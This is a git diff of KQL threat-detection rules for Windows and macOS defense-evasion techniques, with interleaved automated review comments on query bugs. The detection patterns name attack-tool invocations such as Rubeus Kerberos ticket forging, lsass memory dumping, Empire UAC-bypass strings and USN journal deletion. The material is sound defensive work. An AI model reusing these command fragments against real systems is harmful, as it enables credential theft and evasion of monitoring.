\ No newline at end of file diff --git a/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql b/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql index 54cd8cbb..982a1eb1 100644 --- a/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql +++ b/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql 
@@ -1,14 +1,14 @@ -// Title: Fsutil Suspicious Invocation -// Author: Ecco, E.M. Anhaus, oscd.community -// Date: 2019-09-26 -// Level: high -// Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). -// Might be used by ransomwares during the attack (seen by NotPetya and others). -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.impact, attack.t1070, attack.t1485 -// False Positives: -// - Admin activity -// - Scripts and administrative tools used in the monitored environment - -DeviceProcessEvents +// Title: Fsutil Suspicious Invocation +// Author: Ecco, E.M. Anhaus, oscd.community +// Date: 2019-09-26 +// Level: high +// Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). +// Might be used by ransomwares during the attack (seen by NotPetya and others). +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1070, attack.t1485 +// False Positives: +// - Admin activity +// - Scripts and administrative tools used in the monitored environment + +DeviceProcessEvents | where (ProcessCommandLine contains "deletejournal" or ProcessCommandLine contains "createjournal" or ProcessCommandLine contains "setZeroData") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql b/KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql index a6c7ac31..a5ade537 100644 --- a/KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql +++ b/KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql 
@@ -1,12 +1,12 @@ -// Title: Gatekeeper Bypass via Xattr -// Author: Daniil Yugoslavskiy, oscd.community -// Date: 2020-10-19 -// Level: low -// Description: Detects macOS Gatekeeper bypass via xattr utility -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1553.001 -// False Positives: -// - Legitimate activities - -DeviceProcessEvents +// Title: Gatekeeper Bypass via Xattr +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: low +// Description: Detects macOS Gatekeeper bypass via xattr utility +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.001 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents | where (ProcessCommandLine contains "-d" and ProcessCommandLine contains "com.apple.quarantine") and FolderPath endswith "/xattr" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/gpscript_execution.kql b/KQL/rules/Defense Evasion/gpscript_execution.kql index 00f02a38..cb2b5d51 100644 --- a/KQL/rules/Defense Evasion/gpscript_execution.kql +++ b/KQL/rules/Defense Evasion/gpscript_execution.kql 
@@ -1,12 +1,12 @@ -// Title: Gpscript Execution -// Author: frack113 -// Date: 2022-05-16 -// Level: medium -// Description: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate uses of logon scripts distributed via group policy - -DeviceProcessEvents +// Title: Gpscript Execution +// Author: frack113 +// Date: 2022-05-16 +// Level: medium +// Description: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate uses of logon scripts distributed via group policy + +DeviceProcessEvents | where ((ProcessCommandLine contains " /logon" or ProcessCommandLine contains " /startup") and (FolderPath endswith "\\gpscript.exe" or ProcessVersionInfoOriginalFileName =~ "GPSCRIPT.EXE")) and (not(InitiatingProcessCommandLine =~ "C:\\windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql b/KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql index 36d60cb5..96e5944c 100644 --- a/KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql +++ b/KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql 
@@ -1,10 +1,10 @@ -// Title: Greedy File Deletion Using Del -// Author: frack113 , X__Junior (Nextron Systems) -// Date: 2021-12-02 -// Level: medium -// Description: Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.004 - -DeviceProcessEvents +// Title: Greedy File Deletion Using Del +// Author: frack113 , X__Junior (Nextron Systems) +// Date: 2021-12-02 +// Level: medium +// Description: Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 + +DeviceProcessEvents | where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains "\\*.au3" or ProcessCommandLine contains "\\*.dll" or ProcessCommandLine contains "\\*.exe" or ProcessCommandLine contains "\\*.js") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql b/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql index 9ea10c77..e22e42cd 100644 --- a/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql +++ b/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql 
@@ -1,12 +1,12 @@ -// Title: HackTool - EDRSilencer Execution -// Author: @gott_cyber -// Date: 2024-01-02 -// Level: high -// Description: Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - EDRSilencer Execution +// Author: @gott_cyber +// Date: 2024-01-02 +// Level: high +// Description: Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "\\EDRSilencer.exe" or ProcessVersionInfoOriginalFileName =~ "EDRSilencer.exe" or ProcessVersionInfoFileDescription contains "EDRSilencer" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql b/KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql index 905d51f1..aee6f0a8 100644 --- a/KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql +++ b/KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql 
@@ -1,10 +1,10 @@ -// Title: HackTool - Empire PowerShell UAC Bypass -// Author: Ecco -// Date: 2019-08-30 -// Level: critical -// Description: Detects some Empire PowerShell UAC bypass methods -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001 - -DeviceProcessEvents +// Title: HackTool - Empire PowerShell UAC Bypass +// Author: Ecco +// Date: 2019-08-30 +// Level: critical +// Description: Detects some Empire PowerShell UAC bypass methods +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001 + +DeviceProcessEvents | where ProcessCommandLine contains " -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)" or ProcessCommandLine contains " -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql b/KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql index 74133563..65e034c6 100644 --- a/KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql +++ b/KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql 
@@ -1,10 +1,10 @@ -// Title: HackTool - F-Secure C3 Load by Rundll32 -// Author: Alfie Champion (ajpc500) -// Date: 2021-06-02 -// Level: critical -// Description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011 - -DeviceProcessEvents +// Title: HackTool - F-Secure C3 Load by Rundll32 +// Author: Alfie Champion (ajpc500) +// Date: 2021-06-02 +// Level: critical +// Description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents | where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains ".dll" and ProcessCommandLine contains "StartNodeRelay" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql b/KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql index 6294992f..aaa0de88 100644 --- a/KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql +++ b/KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql 
@@ -1,12 +1,12 @@ -// Title: HackTool - GMER Rootkit Detector and Remover Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-05 -// Level: high -// Description: Detects the execution GMER tool based on image and hash fields. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - GMER Rootkit Detector and Remover Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-05 +// Level: high +// Description: Detects the execution GMER tool based on image and hash fields. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "\\gmer.exe" or (MD5 startswith "E9DC058440D321AA17D0600B3CA0AB04" or SHA1 startswith "539C228B6B332F5AA523E5CE358C16647D8BBE57" or SHA256 startswith "E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql b/KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql index e32386a6..98a34c4e 100644 --- a/KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql +++ b/KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql 
@@ -1,12 +1,12 @@ -// Title: HackTool - KrbRelayUp Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-04-26 -// Level: high -// Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.credential-access, attack.t1558.003, attack.lateral-movement, attack.t1550.003 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - KrbRelayUp Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-26 +// Level: high +// Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1558.003, attack.lateral-movement, attack.t1550.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains " relay " and ProcessCommandLine contains " -Domain " and ProcessCommandLine contains " -ComputerName ") or (ProcessCommandLine contains " krbscm " and ProcessCommandLine contains " -sc ") or (ProcessCommandLine contains " spawn " and ProcessCommandLine contains " -d " and ProcessCommandLine contains " -cn " and ProcessCommandLine contains " -cp ") or (FolderPath endswith "\\KrbRelayUp.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelayUp.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_powertool_execution.kql b/KQL/rules/Defense Evasion/hacktool_powertool_execution.kql index 199077a2..cb3a9825 100644 --- a/KQL/rules/Defense Evasion/hacktool_powertool_execution.kql +++ b/KQL/rules/Defense Evasion/hacktool_powertool_execution.kql 
@@ -1,12 +1,12 @@ -// Title: HackTool - PowerTool Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-11-29 -// Level: high -// Description: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - PowerTool Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-11-29 +// Level: high +// Description: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath endswith "\\PowerTool.exe" or FolderPath endswith "\\PowerTool64.exe") or ProcessVersionInfoOriginalFileName =~ "PowerTool.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql b/KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql index 6260e800..5a850327 100644 --- a/KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql +++ b/KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql 
@@ -1,12 +1,12 @@ -// Title: HackTool - Rubeus Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2018-12-19 -// Level: critical -// Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.credential-access, attack.t1003, attack.t1558.003, attack.lateral-movement, attack.t1550.003 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - Rubeus Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2018-12-19 +// Level: critical +// Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1003, attack.t1558.003, attack.lateral-movement, attack.t1550.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "\\Rubeus.exe" or ProcessVersionInfoOriginalFileName =~ "Rubeus.exe" or ProcessVersionInfoFileDescription =~ "Rubeus" or (ProcessCommandLine contains "asreproast " or ProcessCommandLine contains "dump /service:krbtgt " or ProcessCommandLine contains "dump /luid:0x" or ProcessCommandLine contains "kerberoast " or ProcessCommandLine contains "createnetonly /program:" or ProcessCommandLine contains "ptt /ticket:" or ProcessCommandLine contains "/impersonateuser:" or ProcessCommandLine contains "renew /ticket:" or ProcessCommandLine contains "asktgt /user:" or ProcessCommandLine contains "harvest /interval:" or ProcessCommandLine contains "s4u /user:" or ProcessCommandLine contains "s4u /ticket:" or ProcessCommandLine contains "hash /password:" or ProcessCommandLine contains "golden /aes256:" or ProcessCommandLine contains "silver /user:") \ No newline at end of file 
diff --git a/KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql b/KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql index db9b648f..2c0342aa 100644 --- a/KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql +++ b/KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - SharpEvtMute Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-09-07 -// Level: high -// Description: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.002 - -DeviceProcessEvents +// Title: HackTool - SharpEvtMute Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-09-07 +// Level: high +// Description: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 + +DeviceProcessEvents | where FolderPath endswith "\\SharpEvtMute.exe" or ProcessVersionInfoFileDescription =~ "SharpEvtMute" or (ProcessCommandLine contains "--Filter \"rule " or ProcessCommandLine contains "--Encoded --Filter \\\"") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql b/KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql index e0279736..23276ec8 100644 --- a/KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql +++ b/KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql 
@@ -1,12 +1,12 @@ -// Title: HackTool - Wmiexec Default Powershell Command -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-08 -// Level: high -// Description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.lateral-movement -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - Wmiexec Default Powershell Command +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-08 +// Level: high +// Description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.lateral-movement +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_xordump_execution.kql b/KQL/rules/Defense Evasion/hacktool_xordump_execution.kql index 8490e559..959a6a08 100644 --- a/KQL/rules/Defense Evasion/hacktool_xordump_execution.kql +++ b/KQL/rules/Defense Evasion/hacktool_xordump_execution.kql 
@@ -1,12 +1,12 @@ -// Title: HackTool - XORDump Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-01-28 -// Level: high -// Description: Detects suspicious use of XORDump process memory dumping utility -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access -// False Positives: -// - Another tool that uses the command line switches of XORdump - -DeviceProcessEvents +// Title: HackTool - XORDump Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-28 +// Level: high +// Description: Detects suspicious use of XORDump process memory dumping utility +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access +// False Positives: +// - Another tool that uses the command line switches of XORdump + +DeviceProcessEvents | where FolderPath endswith "\\xordump.exe" or (ProcessCommandLine contains " -process lsass.exe " or ProcessCommandLine contains " -m comsvcs " or ProcessCommandLine contains " -m dbghelp " or ProcessCommandLine contains " -m dbgcore ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hh_exe_execution.kql b/KQL/rules/Defense Evasion/hh_exe_execution.kql index 97d3017c..98af0a14 100644 --- a/KQL/rules/Defense Evasion/hh_exe_execution.kql +++ b/KQL/rules/Defense Evasion/hh_exe_execution.kql 
@@ -1,12 +1,12 @@ -// Title: HH.EXE Execution -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community -// Date: 2019-10-24 -// Level: low -// Description: Detects the execution of "hh.exe" to open ".chm" files. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.001 -// False Positives: -// - False positives are expected with legitimate ".CHM" - -DeviceProcessEvents +// Title: HH.EXE Execution +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community +// Date: 2019-10-24 +// Level: low +// Description: Detects the execution of "hh.exe" to open ".chm" files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.001 +// False Positives: +// - False positives are expected with legitimate ".CHM" + +DeviceProcessEvents | where ProcessCommandLine contains ".chm" and (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql b/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql index 4be85f32..04d4584f 100644 --- a/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql +++ b/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql 
@@ -1,13 +1,13 @@ -// Title: Hidden Flag Set On File/Directory Via Chflags - MacOS -// Author: Omar Khaled (@beacon_exe) -// Date: 2024-08-21 -// Level: medium -// Description: Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. -// When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105 -// False Positives: -// - Legitimate usage of chflags by administrators and users. - -DeviceProcessEvents +// Title: Hidden Flag Set On File/Directory Via Chflags - MacOS +// Author: Omar Khaled (@beacon_exe) +// Date: 2024-08-21 +// Level: medium +// Description: Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. +// When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105 +// False Positives: +// - Legitimate usage of chflags by administrators and users. + +DeviceProcessEvents | where ProcessCommandLine contains "hidden " and FolderPath endswith "/chflags" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hidden_user_creation.kql b/KQL/rules/Defense Evasion/hidden_user_creation.kql index 90195830..b494e414 100644 --- a/KQL/rules/Defense Evasion/hidden_user_creation.kql +++ b/KQL/rules/Defense Evasion/hidden_user_creation.kql 
@@ -1,12 +1,12 @@
-// Title: Hidden User Creation
-// Author: Daniil Yugoslavskiy, oscd.community
-// Date: 2020-10-10
-// Level: medium
-// Description: Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.002
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Hidden User Creation
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-10
+// Level: medium
+// Description: Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.002
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "create" and FolderPath endswith "/dscl") and (ProcessCommandLine contains "UniqueID" and ProcessCommandLine matches regex "([0-9]|[1-9][0-9]|[1-4][0-9]{2})")) or ((ProcessCommandLine contains "create" and FolderPath endswith "/dscl") and (ProcessCommandLine contains "IsHidden" and (ProcessCommandLine contains "true" or ProcessCommandLine contains "yes" or ProcessCommandLine contains "1")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql b/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql
index d58aa952..d34e214f 100644
--- a/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql
+++ b/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql
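Review bot: The UniqueID branch of the `| where` line is effectively unconditional, because `ProcessCommandLine matches regex "([0-9]|[1-9][0-9]|[1-4][0-9]{2})"` is unanchored and is satisfied by any single digit anywhere in the command line, so `dscl . create /Users/x UniqueID 1001` matches through the `1`. Anchor the pattern to the value that follows the key, e.g. `ProcessCommandLine matches regex @"UniqueID\s+([0-9]|[1-9][0-9]|[1-4][0-9]{2})(\s|$)"`. The IsHidden branch has the same weakness with `ProcessCommandLine contains "1"`, which any UID or path digit satisfies; `ProcessCommandLine matches regex @"IsHidden\s+(true|yes|1)\b"` would be tighter. The `-`/`+` lines of this hunk are textually identical, so this appears to be a line-ending-only change and the query itself is unchanged context.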
@@ -1,13 +1,13 @@
-// Title: Hide Schedule Task Via Index Value Tamper
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-26
-// Level: high
-// Description: Detects when the "index" value of a scheduled task is modified from the registry
-// Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Hide Schedule Task Via Index Value Tamper
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-26
+// Level: high
+// Description: Detects when the "index" value of a scheduled task is modified from the registry
+// Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Index")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql b/KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql
index 330fa07c..22143a10 100644
--- a/KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql
+++ b/KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql
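Review bot: This rule can never fire as written: `RegistryKey endswith "...\\Schedule\\TaskCache\\Tree*"` compares literally in KQL, and no key path ends in the character `*`; the asterisk is a Sigma wildcard that the converter carried into the literal. Replace the pair with `RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\" and RegistryValueName =~ "Index"`, since in DeviceRegistryEvents the value name is reported in `RegistryValueName` rather than appended to `RegistryKey` (which is also why `RegistryKey contains "Index"` would not match a write to the Index value). It is also worth confirming that `RegistryValueData` carries the Sysmon-style text `DWORD (0x00000000)` in this data source; if it holds the plain number, `RegistryValueData == "0" and RegistryValueType =~ "Dword"` is needed instead. The `-`/`+` lines of this hunk are textually identical, so the change looks line-ending-only and the `| where` line is unchanged context.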
@@ -1,13 +1,13 @@
-// Title: Hiding Files with Attrib.exe
-// Author: Sami Ruohonen
-// Date: 2019-01-16
-// Level: medium
-// Description: Detects usage of attrib.exe to hide files from users.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.001
-// False Positives:
-// - IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)
-// - Msiexec.exe hiding desktop.ini
-
-DeviceProcessEvents
+// Title: Hiding Files with Attrib.exe
+// Author: Sami Ruohonen
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects usage of attrib.exe to hide files from users.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+// False Positives:
+// - IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)
+// - Msiexec.exe hiding desktop.ini
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " +h " and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE")) and (not(ProcessCommandLine contains "\\desktop.ini ")) and (not((ProcessCommandLine =~ "+R +H +S +A \\*.cui" and InitiatingProcessCommandLine =~ "C:\\WINDOWS\\system32\\*.bat" and InitiatingProcessFolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql
index e0df0a0f..f5eca91e 100644
--- a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql
+++ b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql
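Review bot: The igfxCUIService exclusion on the `| where` line never suppresses anything: `ProcessCommandLine =~ "+R +H +S +A \\*.cui"` is a whole-string equality and a real command line begins with the image name (`attrib ...`), so it cannot be equal, and the `\\*` escape produces a literal backslash-asterisk that attrib is never invoked with; `InitiatingProcessCommandLine =~ "C:\\WINDOWS\\system32\\*.bat"` has the same problem and its `*` reads as a Sigma wildcard rather than a literal. Use suffix/prefix matches instead, e.g. `ProcessCommandLine endswith "+R +H +S +A *.cui" and InitiatingProcessCommandLine startswith "C:\\WINDOWS\\system32\\" and InitiatingProcessCommandLine endswith ".bat"`. Until that is fixed the documented false positive is not actually filtered, so the rule will alert on every Intel graphics service run. The `-`/`+` lines of this hunk are textually identical, so the query itself is unchanged context here.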
